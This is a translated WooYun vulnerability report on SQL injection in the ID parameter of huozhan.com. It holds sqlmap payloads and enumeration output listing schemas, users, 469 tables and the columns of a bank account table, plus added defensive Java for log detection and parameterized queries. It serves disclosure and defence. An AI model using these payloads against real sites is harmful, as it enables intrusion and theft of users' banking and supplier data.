
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0142233

Title: SQL injection in huozhan.com (货栈网) can leak large amounts of sensitive information (user data, supplier data, store data, etc.)

Affected vendor: 货栈网

Author: 路人甲

Submitted: 2015-09-20 10:02

Fix deadline: 2015-11-04 10:04

Disclosed: 2015-11-04 10:04

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 13

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-20: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-11-04: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection in huozhan.com (货栈网) leaks large amounts of sensitive information (user data, supplier data, store data, etc.)

Detailed description:

The injection directly exposes users' bank card details, as well as supplier and store information.
Link: http://www.huozhan.com/ArticlesAction_detail.do?ID=187

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=187 AND 3926=3926
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: ID=-9116 UNION ALL SELECT NULL,CHR(58)||CHR(102)||CHR(106)||CHR(109)||CHR(58)||CHR(97)||CHR(82)||CHR(74)||CHR(75)||CHR(71)||CHR(103)||CHR(72)||CHR(88)||CHR(117)||CHR(72)||CHR(58)||CHR(119)||CHR(117)||CHR(104)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=187 AND 2947=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(70)||CHR(69)||CHR(89),5)
---
[15:45:04] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[15:45:04] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:45:04] [INFO] fetching database (schema) names
[15:45:05] [INFO] the SQL query used returns 7 entries
[15:45:05] [INFO] retrieved: "HRZMART"
[15:45:05] [INFO] retrieved: "HUOZHAN"
[15:45:06] [INFO] retrieved: "OUTLN"
[15:45:06] [INFO] retrieved: "SHOP"
[15:45:06] [INFO] retrieved: "SYS"
[15:45:06] [INFO] retrieved: "SYSTEM"
[15:45:07] [INFO] retrieved: "WMSYS"
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS
fetching current user
current user: 'HUOZHAN'
current schema (equivalent to database on Oracle): 'HUOZHAN'
database management system users [15]:
[*] AK
[*] DBSNMP
[*] GAOZHAN
[*] HRZMAR
[*] HRZMART
[*] HUOZHAN
[*] HUOZHANCREA
[*] HUOZHANMODI
[*] HUOZHANSELE
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] ZWELL
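
As an added example, not part of the original report: a defender-side check of the same ID parameter in Nginx access logs (sqlmap records the front end as Nginx/JSP). Instead of matching sqlmap signatures, it uses the type the dumped schema gives the column (ID is a NUMBER) as an allow-list, so all three injection shapes sqlmap reported (boolean-based, UNION, time-based) fall out as non-numeric values. The log lines are constructed, and the class and method names are my own.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ArticleIdLogCheck {

    // Request part of an Nginx "combined" log line: "GET /path?query HTTP/1.x".
    // Only the endpoint named in the report is inspected.
    private static final Pattern REQUEST = Pattern.compile(
        "\"(?:GET|POST) /ArticlesAction_detail\\.do(?:\\?([^ \"]*))? HTTP/");

    // What a legitimate article ID looks like (ID is a NUMBER column in the dump):
    // plain digits and nothing else. Anything outside this allow-list is reported.
    private static final Pattern NUMERIC_ID = Pattern.compile("[0-9]{1,18}");

    /** Returns the decoded ID value when it is not a plain number, otherwise null. */
    static String suspiciousId(String logLine) {
        Matcher m = REQUEST.matcher(logLine);
        if (!m.find() || m.group(1) == null) {
            return null;                       // other endpoint, or no query string
        }
        for (String pair : m.group(1).split("&")) {
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            if (!key.equalsIgnoreCase("ID")) {
                continue;
            }
            String decoded;
            try {
                decoded = URLDecoder.decode(value, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException bad) {
                return value;                  // malformed percent-encoding: report as-is
            }
            if (!NUMERIC_ID.matcher(decoded).matches()) {
                return decoded;
            }
        }
        return null;
    }

    /** Collects "<line number>: <offending ID>" for every line that fails the check. */
    static List<String> scan(List<String> lines) {
        List<String> hits = new ArrayList<>();
        for (int i = 0; i < lines.size(); i++) {
            String bad = suspiciousId(lines.get(i));
            if (bad != null) {
                hits.add((i + 1) + ": " + bad);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample lines; the three bad ones mirror the payload shapes
        // (boolean-based, UNION, time-based) that sqlmap reported in the write-up.
        String tail = " HTTP/1.1\" 200 5120 \"-\" \"Mozilla/5.0\"";
        List<String> sample = List.of(
            "203.0.113.10 - - [20/Sep/2015:15:45:01 +0800] \"GET /ArticlesAction_detail.do?ID=187" + tail,
            "203.0.113.10 - - [20/Sep/2015:15:45:04 +0800] \"GET /ArticlesAction_detail.do?ID=187%20AND%203926%3D3926" + tail,
            "203.0.113.10 - - [20/Sep/2015:15:45:05 +0800] \"GET /ArticlesAction_detail.do?ID=-9116%20UNION%20ALL%20SELECT%20NULL%2CNULL%20FROM%20DUAL--" + tail,
            "203.0.113.10 - - [20/Sep/2015:15:45:06 +0800] \"GET /ArticlesAction_detail.do?ID=187%20AND%202947%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(114),5)" + tail,
            "203.0.113.10 - - [20/Sep/2015:15:45:07 +0800] \"GET /index.jsp" + tail);
        for (String hit : scan(sample)) {
            System.out.println("suspicious ID -> " + hit);   // lines 2, 3 and 4 are reported
        }
    }
}
```

Because the check is positive (what a valid ID must look like) rather than negative (a list of SQL keywords), it does not need updating for each new tamper script, and the same rule can be enforced in front of the database in the application itself.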


Proof of vulnerability:

As many as 469 tables, including all kinds of sensitive information.

web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: HUOZHAN
[469 tables]
+--------------------------------+
| A |
| AAAA12 |
| ABA |
| ABC |
| ABCD |
| ADDRESS_INFO |
| ADMIN_USER |
| AREA_BAR_CODE |
| AREA_BRAND |
| AREA_CATEGORY |
| AREA_INFO |
| AREA_ITEM |
| AREA_ITEM_CATEGORY |
| AREA_VIP |
| AREA_VIP_CATEGORY |
| AREA_VIP_ITEM |
| AREA_VIP_STORE |
| ARTICLE |
| ARTICLE_CATEGORY |
| ATW0614 |
| ATW0614_2 |
| ATW09 |
| AUTH |
| AUTHUSER_0801 |
| AUTH_BAK |
| AUTH_CHILD_ROLE |
| AUTH_CHILD_ROLE_ACCESS |
| AUTH_ROLE |
| AUTH_ROLE_ACCESS |
| AUTH_ROLE_ACCESSBAK |
| AUTH_ROLE_ACCESS_1 |
| AUTH_USER |
| AUTH_USER_BAK |
| AUTH_USER_CHILD_ROLE |
| AUTH_USER_MSG |
| AUTH_USER_ROLE |
| AUUSER0709 |
| BALANCE_TABLE |
| BANK_BILL_RECORD |
| BANK_CODE |
| BANK_PAY_ACCOUNT |
| BANK_PAY_LOG |
| BF_0831_DRX |
| BILL_DETAIL |
| BILL_ITEM |
| BILL_ORDER |
| BILL_SUPPLIER_RATE |
| BILL_SUPPLIER_RATE_TEMP |
| BILL_SYS_RATE |
| BRAND |
| BUSINESS_COMMENTS |
| BUSS_COMPANY |
| BUSS_EXTR_TOTAL |
| BUSS_MONEY |
| CARD_ACCOUNT_REPORT |
| CATEGORY_BRAND |
| CHILD_USER_INFO |
| CITY |
| CK1320 |
| CKCX |
| CKCX2 |
| CLIENT_MEMBER_SHOP |
| CLIENT_ORDERS_TEMP |
| CONTRACT |
| CREDENTIAL_INFO |
| CZ_0914FE |
| DAY_CATEGORY_BILL_SUMMARY |
| DAY_ITEM_BILL_SUMMARY |
| DAY_ITEM_BILL_SUMMARY_TEMP |
| DAY_LOGISTICS_ACHIEVEMENT |
| DAY_LOGISTICS_ACHIEVEMENT_TEMP |
| DAY_SETTLEMNET_LOG |
| DAY_STORE_BILL_SUMMARY |
| DAY_STORE_MONEY |
| DAY_SUPPLIER_BILL_SUMMARY |
| DAY_SUPPLIER_MEMBER_SUMMARY |
| DESK_ANNOUNCE |
| DIRECT_SUPPLY_SHOW |
| DLA_OLD |
| ET_OTP_PROD |
| ET_OTP_RECORD |
| ET_OTP_USER |
| FANKUAN_TW |
| FC1320 |
| FCCX |
| FCCX2 |
| FINANCE_PARAM_SET |
| GAOZHAN_TEST |
| GATHER_LOG |
| GG_0607 |
| GIFT_ITEM_DAY_SETTLEMNET |
| GIFT_ITEM_IN |
| GIFT_ITEM_IN_DETAIL |
| GIFT_ITEM_OUT |
| GIFT_ITEM_OUT_DETAIL |
| GIFT_ITEM_RETURN |
| GIFT_ITEM_RETURN_DETAIL |
| GIFT_ITEM_STORE_DETAIL |
| HRZPAY_ARTICLE |
| HRZPAY_ARTICLE_CATEGORY |
| HRZ_P0811 |
| HRZ_PAY_USER |
| HRZ_WORK |
| HRZ_WORK_USER |
| HUOZHAN_ADVERTISE |
| HZ_MESSAGE |
| HZ_NEWS |
| HZ_NEWS_SORT |
| INVENTORY |
| INVENTORY_CHANGE_DETAIL |
| INVENTORY_CHANGE_TOTAL |
| INVENTORY_DETAIL |
| INVENTORY_JOURNAL |
| ITEM_CATEGORY |
| ITEM_DAY_DETAILS |
| ITEM_DAY_SETTLEMNET |
| ITEM_DAY_SETTLEMNET_TEMP |
| ITEM_PLU_CODE |
| ITEM_ROOM |
| ITEM_TEMP |
| ITW0906 |
| JXYF_PHONE_PROD |
| JXYF_PHONE_RECORD |
| JXYF_QQ_PROD |
| JXYF_QQ_RECORD |
| KC2012120211 |
| KCSUP_ITEM |
| KC_ITEM0718 |
| LOGISTICS_FEE_TYPE |
| LOGISTICS_FINANCE_TOTAL |
| LOGISTICS_INFO |
| LOGISTICS_LINE |
| LOGISTICS_MONEY |
| LOGISTICS_ORDER_OPER |
| LOGISTICS_PINGJIA_MAN |
| LOGISTICS_PINGJIA_TOTAL |
| LOGISTICS_RECEIVE |
| LOGISTICS_RECEIVE_DETAIL |
| LOGISTICS_REQUEST |
| LOGISTICS_REQUEST_DETAILS |
| LOGISTICS_SENDOUT_DETAIL |
| LOGISTICS_SENDOUT_TOTAL |
| LOGISTICS_SERVICE_MAN |
| LOGISTICS_TASK_FEE |
| LOGISTICS_TASK_ORDER |
| LOGISTICS_TASK_TOTAL |
| LOGISTICS_TASK_USER |
| LOGISTICS_USER |
| LOGISTICS_USER_CATEGORY |
| LOGISTICS_USER_OPER |
| LOGISTICS_USER_WORKREPORT |
| LOGISTICS_VEHICLE |
| LOVE_ITEM |
| MARKET_BILL_RECORD |
| MARKET_BILL_RECORD_DETAIL |
| MARKET_ENTRY |
| MARKET_ENTRY_CANCEL |
| MARKET_ENTRY_CONTRACT |
| MARKET_PAY |
| MARKET_USER_ACCOUNT |
| MARKET_USER_ACCOUNT_RIGHT |
| MEMBER_FEE |
| MEMBER_FEE_BAK |
| MEM_CARDSUM_TYPE |
| MEM_CARD_INFO |
| MEM_CARD_INFO_BACK |
| MEM_CARD_INFO_OLD |
| MEM_CARD_INFO_TEMP |
| MEM_CARD_SCORING_RECORD |
| MEM_CARD_SCORING_STORE |
| MEM_CARD_SCORING_TRADE |
| MEM_CARD_TOTAL |
| MEM_CARD_TYPE |
| MEM_CONSUME_RECORD |
| MEM_MEMBER_INFO |
| MEM_PAY_MONEY |
| MM1_0823 |
| MM_0823 |
| NAMEQI0714 |
| NEW_FLAG_ITEM |
| OPERATOR_STORE |
| ORDERDETAIL0709 |
| ORDERTOTAL0709 |
| ORDER_CODE_1320 |
| PARAMETER_SET |
| PDA_INFO |
| PDA_JOURNAL |
| PDA_USER |
| PLAN_TABLE |
| PLU_CATEGORY |
| POVINCE |
| PROMOTION_DETAIL |
| PROMOTION_PRESENT_DETAIL |
| PROMOTION_PRESENT_TOTAL |
| PROMOTION_TOTAL |
| PUB_ITEM |
| PUB_ITEM_CATEGORY |
| PUB_ITEM_OLDCATEGORY |
| PURCHASER |
| QUEST_SOO_AT_APPNAME |
| QUEST_SOO_AT_EXECUTION_PLAN |
| QUEST_SOO_AT_OPERATIONS |
| QUEST_SOO_AT_PARSE_CURSOR |
| QUEST_SOO_AT_PARSE_ERROR |
| QUEST_SOO_AT_PARSE_WAITS |
| QUEST_SOO_AT_SESSION_ID |
| QUEST_SOO_AT_SQL_BINDS |
| QUEST_SOO_AT_SQL_EXECUTIONS |
| QUEST_SOO_AT_SQL_EXEC_ERROR |
| QUEST_SOO_AT_SQL_FETCH |
| QUEST_SOO_AT_SQL_STATEMENT |
| QUEST_SOO_AT_SQL_STMT_PIECES |
| QUEST_SOO_AT_SQL_WAITS |
| QUEST_SOO_AT_TRACE_FILE |
| QUEST_SOO_AT_WAIT_NAMES |
| QUEST_SOO_BUFFER_BUSY |
| QUEST_SOO_EVENT_CATEGORIES |
| QUEST_SOO_LOCK_TREE |
| QUEST_SOO_PARSE_TIME_TRACK |
| QUEST_SOO_PLAN_TABLE |
| QUEST_SOO_SB_BUFFER_BUSY |
| QUEST_SOO_SB_EVENT |
| QUEST_SOO_SB_IO_STAT |
| QUEST_SOO_SCHEMA_VERSIONS |
| QUEST_SOO_VERSION |
| REPORT_ARRIVAL_RATE |
| REPORT_BRAND_TRANSACTION |
| REPORT_CATEGORY_DAILY |
| REPORT_CATEGORY_TRANSACTION |
| REPORT_ITEM_CONSIGNMENT |
| REPORT_ITEM_DAILY |
| REPORT_STORE_ORDER_ALLOCATION |
| REPORT_STORE_RECEIVE |
| REPORT_STORE_TRANSACTION |
| REPORT_SUPPLIER_OUT_STOCK |
| RETAIL_PRODUCT |
| RK1320 |
| RKCX |
| RKCX2 |
| RR1SS |
| RR2SS |
| S1102_S |
| SCORE_INFO |
| SCORE_SET |
| SECOND_KILL_ITEM |
| SECOND_KILL_USER |
| SERVICE_MAN |
| SERVICE_MAN_FINANCE_TOTAL |
| SERVICE_MAN_ITEM_CATEGORY |
| SERVICE_MAN_RATE |
| SFD_0810 |
| SHOPITEM0709 |
| SHOP_DAY_R_XS |
| SM0915_T |
| SOT20130118 |
| SSD20130204 |
| SSDTW0613 |
| SSD_0830 |
| SSS0530 |
| ST020130205 |
| ST0425TW_ART |
| STI_NULL_W0520 |
| STOCK_AREA |
| STOCK_AREA_ITEM_CATEGORY |
| STOCK_BAD_DETAIL |
| STOCK_CHG_1008T |
| STOCK_CHG_2132T |
| STOCK_GIFT_ITEM |
| STOCK_HISTORY_DAY |
| STOCK_HONGCHONG_DETAIL |
| STOCK_HONGCHONG_TOTAL |
| STOCK_ITEM_ADJUST |
| STOCK_LACK |
| STOCK_LOGS |
| STOCK_LOGS1101_ |
| STOCK_LOGS1101_MIN_ID |
| STOCK_LOGS1101_NUM |
| STOCK_LOGS1101_NUM_ALL |
| STOCK_NORMAL_DETAIL |
| STOCK_ROOM |
| STOCK_ROOM_EXCHANGE |
| STOCK_ROOM_EXCHANGE_DETAIL |
| STOCK_ROOM_ITEM |
| STOCK_TOTAL |
| STOCK_TOTALCZ0718 |
| STOCK_TOTAL_BATCH |
| STOCK_TOTAL_BATCH0901 |
| STOCK_TOTAL_BATCH_22 |
| STOCK_TOTAL_BATCH_823 |
| STOCK_TOTAL_BATCH_829 |
| STOCK_TOTAL_BATCH_CHG |
| STOCK_TOTAL_BATCH_CHG0901 |
| STOCK_TOTAL_BATCH_CHG_823 |
| STOCK_TOTAL_BATCH_CHG_829 |
| STOCK_TOTAL_CHGAVG_LOG |
| STOCK_TOTAL_DAHU |
| STOCK_TOTAL_DAY |
| STOCK_TOTAL_LOG |
| STOCK_UNEQUAL_RECORD |
| STORE |
| STORE1_AC_REPORJ0823 |
| STORE_ACCOUNT_DAY_REPORT |
| STORE_ACCOUNT_REPORT |
| STORE_AC_REPORJ0823 |
| STORE_CARDSALE_DETAIL |
| STORE_FAVOR |
| STORE_HOMOLOGOUS |
| STORE_HUOZHAN |
| STORE_ITEM_STOCK |
| STORE_KEEP_MONEY |
| STORE_MONEY |
| STORE_MONEY_CZ2 |
| STORE_MONEY_EXTR |
| STORE_MONEY_TEMP |
| STORE_MON_0816 |
| STORE_ORDER_DETAIL |
| STORE_ORDER_DIFF_DETAIL |
| STORE_ORDER_DIFF_TOTAL |
| STORE_ORDER_DIRECT |
| STORE_ORDER_OVERING |
| STORE_ORDER_SECONDKILL_DETAIL |
| STORE_ORDER_STATUS |
| STORE_ORDER_TEMP |
| STORE_ORDER_TEMP_NULL |
| STORE_ORDER_TOTAL |
| STORE_ORDER_TOTAL_0317CZ2 |
| STORE_ORDER_TOTAL_ERRORBALANCE |
| STORE_PREPAID_MONEY |
| STORE_PUB_ITEM |
| STORE_RECHARGEABLE |
| STORE_RETURN_DETAIL |
| STORE_RETURN_MONEY |
| STORE_RETURN_TOTAL |
| STORE_SELF_ITEM |
| STORE_SENDOUT_DETAIL |
| STORE_SEN_ITEM0614 |
| STORE_SEN_ITEM0614CD |
| STORE_SORT |
| STORE_STORETYPE |
| STORE_TRANSACTION_PRICE |
| STORE_TYPE |
| STORE_TYPE_ITEM |
| STORE_TYPE_ITEM_GIFT_DETAIL |
| STORE_TYPE_ITEM_GIFT_TOTAL |
| STORE_TYPE_ITEM_HIS |
| STORE_TYPE_ITEM_NEW |
| STORE_TYPE_ITEM_UPSHELF |
| STORE_TYPE_ITE_20120502 |
| STORE_USER |
| SUB_AREA_INFO |
| SUB_AREA_ITEM |
| SUGGED_ITEM |
| SUM_0519W |
| SUPPLIER |
| SUPPLIER_ACCOUNT_DAY_RPT |
| SUPPLIER_ACCOUNT_REPORT |
| SUPPLIER_ADVERTISEMENT |
| SUPPLIER_AREA_FEE |
| SUPPLIER_BRAND |
| SUPPLIER_BRAND_TEMP |
| SUPPLIER_CATEGORY |
| SUPPLIER_CATEGORY_ALIAS |
| SUPPLIER_CATEGORY_TEMP |
| SUPPLIER_CHANGE_PRICE |
| SUPPLIER_CHANGE_TOTAL |
| SUPPLIER_CUSTOMERS |
| SUPPLIER_DELIVERY |
| SUPPLIER_DIRECT_OUT_DETAIL |
| SUPPLIER_DIRECT_OUT_SUM_DETAIL |
| SUPPLIER_DIRECT_OUT_TOTAL |
| SUPPLIER_FEE |
| SUPPLIER_FEE_DETAIL |
| SUPPLIER_FEE_TOTAL |
| SUPPLIER_FINANCE_DAY |
| SUPPLIER_FINANCE_DETAIL |
| SUPPLIER_FINANCE_DETAIL_0927 |
| SUPPLIER_FINANCE_DETAIL_CZ2 |
| SUPPLIER_FINANCE_TOTAL |
| SUPPLIER_FINANCE_TOTAL_CZ2 |
| SUPPLIER_GETFEE_DETAIL |
| SUPPLIER_GETFEE_TOTAL |
| SUPPLIER_GETFEE_TYPE |
| SUPPLIER_HUOZHAN |
| SUPPLIER_ITEM |
| SUPPLIER_ITEM_FEE_DETAIL |
| SUPPLIER_ITEM_FEE_TOTAL |
| SUPPLIER_ITEM_IMG |
| SUPPLIER_ITEM_PURCHASER |
| SUPPLIER_KEEP_MONEY |
| SUPPLIER_MEMBERS |
| SUPPLIER_MEMBERS_EXTR |
| SUPPLIER_MONEY |
| SUPPLIER_MONEY1026T |
| SUPPLIER_MONEY1028 |
| SUPPLIER_MONEY_0205 |
| SUPPLIER_MONEY_0728 |
| SUPPLIER_MONEY_092311 |
| SUPPLIER_MONEY_092311A |
| SUPPLIER_MONEY_1209 |
| SUPPLIER_MONEY_3111247 |
| SUPPLIER_MONEY_3170221 |
| SUPPLIER_MONEY_3171052 |
| SUPPLIER_MONEY_910TW |
| SUPPLIER_MONEY_913TW |
| SUPPLIER_MONEY_913TW2 |
| SUPPLIER_MONEY_99TW |
| SUPPLIER_MONEY_BAK_60101 |
| SUPPLIER_MONEY_CZ2 |
| SUPPLIER_MONEY_NTW910 |
| SUPPLIER_MONEY_NTW99 |
| SUPPLIER_MONY010075 |
| SUPPLIER_NEW_FINDETAIL |
| SUPPLIER_RECD_ITEM |
| SUPPLIER_RETURN_DETAIL |
| SUPPLIER_RETURN_TOTAL |
| SUPPLIER_STAR |
| SUPPLIER_STOCK_MONEY |
| SUPPLIER_STOCK_RECORD |
| SUPPLIER_STORETYPE_ITEM |
| SUPPLIER_STORETYPE_ITEM_LOG |
| SUPPLIER_STORE_ACCPER |
| SUPPLIER_STORE_DELIVERY |
| SUPPLIER_STORE_PRICE |
| SUPPLIER_STORE_PROXYITEM |
| SUPPLIER_STORE_RECORD |
| SUPPLIER_STORE_TYPE |
| SUPPLIER_SUB_AREA |
| SUPPLIER_USER |
| SUPP_ITEM_0822 |
| SWAY_0711 |
| SYSTEM_ARGS |
| SYSTEM_INFO |
| SYSTEM_JOBS |
| S_MONEY0804 |
| TH1320 |
| THCX |
| THCX2 |
| THIRD_LOGISTICS_ITEM |
| THIRD_LOGISTICS_ORDER |
| THIRD_LOGISTICS_ORDER_DETAIL |
| THIRD_LOGISTICS_ORDER_TOTAL |
| TIMER_TEST |
| TMP_DAY_STORE_MONEY |
| TOP_ITEM |
| TW0709 |
| TW07092 |
| TW0713 |
| TW_120821 |
| TW_120821AU |
| UNIT_TRANS |
| URLFILTER |
| USER_ACCESS_RECORD |
| USER_BANK_ACCOUNT |
| USER_DOMAIN |
| USER_OPER_LOG |
| USER_RECHARGE_ACCOUNT |
| USER_RECHARGE_TYPE |
| USER_SUGGEST |
| WEB_CHANGE_PRICE |
| WEB_CHANGE_PRICE_DETAIL |
| WEB_CHANGE_PRICE_TOTAL |
| WORKER_ORDER |
| WORKER_WAREHOUSE |
| XGSJ20130206 |
| XIFEI_TW |
| YEE_BILL_RECORD |
| YEE_BILL_RECORD_DETAIL |
| YL_0519W |
| ZS_0831S |
+--------------------------------+
Database: HUOZHAN
Table: USER_BANK_ACCOUNT
[12 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ACCOUNT_NO | VARCHAR2 |
| ACCOUNT_PROP | CHAR |
| ACCOUNT_TYPE | CHAR |
| AREA_CODE | VARCHAR2 |
| BANK_ADDRESS | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| ID | NUMBER |
| STATUS | CHAR |
| USER_CODE | VARCHAR2 |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| USER_TYPE | CHAR |
+--------------+----------+


There is too much data, so I won't dump it here.

Remediation:

Filter input.
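
To make the remediation concrete, here is an added example that is not the site's own source (the report does not include any): the string-concatenating pattern that sqlmap's findings imply, beside a hardened version that validates the parameter and binds it with a PreparedStatement. The ARTICLE table appears in the dump above, but its TITLE column, the ArticleDao class and the DataSource wiring are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import javax.sql.DataSource;

public class ArticleDao {
    private final DataSource ds;   // assumed: a JDBC pool pointing at the Oracle instance

    public ArticleDao(DataSource ds) {
        this.ds = ds;
    }

    // VULNERABLE (illustrative): the raw "ID" request parameter is pasted into the
    // SQL text, so "187 AND 3926=3926", a "-9116 UNION ALL SELECT ... FROM DUAL--"
    // or a DBMS_PIPE.RECEIVE_MESSAGE(...) delay all become part of the statement.
    public String findTitleUnsafe(String rawId) throws SQLException {
        String sql = "SELECT TITLE FROM ARTICLE WHERE ID = " + rawId;
        try (Connection c = ds.getConnection();
             Statement st = c.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getString("TITLE") : null;
        }
    }

    // HARDENED: (1) the parameter is checked against the type the column really has
    // (the dump shows ID as NUMBER), and (2) the value is bound with a
    // PreparedStatement, so Oracle receives it as data and never parses it as SQL.
    public String findTitle(String rawId) throws SQLException {
        long id = parseArticleId(rawId);   // throws before any database round trip
        String sql = "SELECT TITLE FROM ARTICLE WHERE ID = ?";
        try (Connection c = ds.getConnection();
             PreparedStatement ps = c.prepareStatement(sql)) {
            ps.setLong(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("TITLE") : null;
            }
        }
    }

    // Allow-list validation: a positive integer of sane length, nothing else.
    // The caller should map the exception to an HTTP 400 and log the rejected value.
    static long parseArticleId(String rawId) {
        if (rawId == null || !rawId.matches("[1-9][0-9]{0,17}")) {
            throw new IllegalArgumentException("invalid article ID");
        }
        return Long.parseLong(rawId);
    }
}
```

Binding the value is what actually removes the injection; the numeric check in front of it is the "filtering" the report asks for, done as an allow-list rather than a deny-list of SQL keywords, and it lets the application refuse the request before the database is touched. Separately, the dump shows the application connecting as HUOZHAN, the owner of the schema; giving the web tier a dedicated account with only the SELECT privileges it needs would limit what any future injection could read or change.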

Copyright notice: please credit the source, 路人甲@乌云, when reposting.


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond.

Vulnerability rank: 15 (WooYun rating)